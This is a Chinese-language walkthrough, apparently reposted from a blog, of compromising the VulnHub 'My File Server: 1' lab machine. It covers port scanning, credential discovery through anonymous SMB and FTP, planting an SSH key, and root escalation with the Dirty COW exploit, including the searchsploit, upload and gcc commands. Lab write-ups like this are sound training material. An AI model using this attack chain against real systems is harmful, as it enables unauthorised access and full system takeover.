MY FILE SERVER: 1

2023-12-25 20:35:35

下载地址

?https://download.vulnhub.com/myfileserver/My_file_server_1.ova

首先我们需要发现ip

我的kali是59.162所以167就是靶机的

然后我们拿nmap扫一下端口

nmap -sV -p- 192.168.59.167

扫完发现有七个端口开放 按照习惯先看80

没看到有啥有用信息,用nikto扫一下

nikto -h 192.168.59.167

发现了一个readme.txt

访问后发现了一个密码

但是不知道密码是哪个服务的 尝试一下ftp匿名登陆

连接上了也没有什么可以利用的信息

ssh连接显示没有权限(就不展示了)

尝试使用smbmap进行枚举 发现smbdate有读写权限

使用smbclient //192.168.59.167/smbdata???? 连接共享目录,只有smbdata可以匿名访问

下载secure和sshd_config

下载完退出smb(exit),然后cat查看这两个文件发现发现用户smbuser,密码chauthtok

现在已经有了用户名smbuser,而且一开始网页给了密码rootroot1。那么再尝试一下用ftp登录(不知道为啥密码不能用chauthtok)登录成功

进行ssh免密操作,然后上传到靶机 在进行ssh登入 登入成功

ssh-keygen -t rsa #生成公钥私钥文件

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。

ssh -i test smbuser@192.168.59.167

下一步就是提权

这里发现内核版本较低,可以尝试使用脏牛提权

先搜索漏洞库

searchsploit dirty

下载到本地

searchsploit -m 40616.c

使用FPT上传脏牛文件到服务器 然后gcc编译提权

put /root/40616.c /tmp/dirty.c

重新ssh去到tmp下

gcc -pthread dirty.c -o dirty -lcrypt

执行./dirty 123456

可以看到权限已经获取到

成功获取flag

文章来源:https://blog.csdn.net/zzf011900/article/details/135208048
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。